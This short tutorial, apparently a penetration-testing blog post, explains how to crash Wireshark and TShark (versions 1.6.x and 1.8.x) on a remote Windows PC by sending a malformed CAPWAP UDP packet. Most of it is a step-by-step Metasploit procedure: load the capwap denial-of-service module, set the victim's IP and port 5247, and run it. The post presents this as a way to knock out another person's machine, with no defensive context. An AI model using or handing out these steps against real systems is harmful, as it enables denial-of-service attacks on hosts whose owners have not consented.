Categories

Archives

Kali Linux, Penetration Testing

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a packet correctly when an incorrect length is given.

Exploit Targets

Wireshark 1.8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use auxiliary/dos/wireshark/capwap

msf exploit (capwap)>set rhost 192.168.1.11 (IP of Remote PC)

msf exploit (capwap)>set rport 5247

msf exploit (capwap)>exploit